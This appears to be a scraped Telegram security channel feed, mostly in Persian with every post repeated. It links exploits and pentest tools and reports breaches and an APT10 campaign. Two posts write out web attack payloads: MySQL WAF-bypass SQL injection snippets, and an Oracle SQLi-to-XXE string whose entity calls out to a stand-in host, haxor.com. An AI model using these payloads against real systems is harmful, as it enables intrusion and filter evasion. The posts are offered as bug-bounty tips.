امنیت اطلاعات
PoC CVE-2019-11043 https://github.com/theMiddleBlue/CVE-2019-11043 #php #nginx #rce @sec_nerd
آنالیز فنی آسیب پذیری php-fpm و nginx توسط orange tsai
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
Orange Tsai
An analysis and thought about recently PHP-FPM RCE (CVE-2019-11043)
First of all, this is such a really interesting bug! From a small memory defect to code execution. It combines both binary and web technique so that’s why it interested me to trace into. This is just
راهکارهای پیدا کردن آی پی واقعی وبسایتهایی که از Cloudflare استفاده میکنند + ۲ ابزار برای این کار
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
Some MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd
Forwarded from امنیت اطلاعات
رایت آپ کشف آسیب پذیری های متعدد از نوع XSS و CSRF و XXE و رسیدن به RCE در پلتفرم متن باز LabKey Server
https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/
#writeup
#web
#pentest
#csrf
#xxe
#xss
#rce
@sec_nerd
https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/
#writeup
#web
#pentest
#csrf
#xxe
#xss
#rce
@sec_nerd
Rhino Security Labs
Vulnerabilities Leading to RCE in LabKey Server
This post discusses 3 LabKey Server CVEs. The vulnerabilities, XSS, CSRF & XXE, can be used together to achieve RCE using intended functionality of the app.
بزرگترین دیتابیس کارتهای اعتباری شهروندان هندی در دارک نت به فروش گذاشته شد.
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.
https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/
#news
#breach
#india
#fin7
@sec_nerd
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.
https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/
#news
#breach
#india
#fin7
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
ساخت دندان با استفاده از پرینت سه بعدی!
https://twitter.com/0xAmit/status/1189610151696850944
#shitty_future
@sec_nerd
https://twitter.com/0xAmit/status/1189610151696850944
#shitty_future
@sec_nerd
لیست 3203 کلمه معمول مورد استفاده در APIها
مناسب برای عملیات Fuzzing
https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d
#api
#pentest
#web
#bugbounty
@sec_nerd
مناسب برای عملیات Fuzzing
https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d
#api
#pentest
#web
#bugbounty
@sec_nerd
Gist
A list of 3203 common API endpoints and objects designed for fuzzing.
A list of 3203 common API endpoints and objects designed for fuzzing. - List of API endpoints & objects
محققان Cybereason کمپینی را شناسایی کردند که شرکتهای ارائه دهنده خدمات مخابراتی بزرگ را هدف قرار داده است.
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.
جزییات بیشتر و شرح فنی این حملات:
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
#news
#apt10
#telecom
@sec_nerd
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.
جزییات بیشتر و شرح فنی این حملات:
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
#news
#apt10
#telecom
@sec_nerd
Cybereason
Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers
In 2018, the Cybereason Nocturnus team identified Operation Soft Cell, an advanced, persistent attack targeting global telecommunications providers.
مجموعه ماشین های مجازی برای تقویت قابلیت های تست نفوذ به وب
https://pastebin.com/dmqmBTwz
#web
#pentest
#lab
@sec_nerd
https://pastebin.com/dmqmBTwz
#web
#pentest
#lab
@sec_nerd
تبدیل SQLi به XXE با استفاده از تابع xmltype
id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'
(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)
#sqli
#xxe
#web
#bugbounty
#pentest
@sec_nerd
id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'
(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)
#sqli
#xxe
#web
#bugbounty
#pentest
@sec_nerd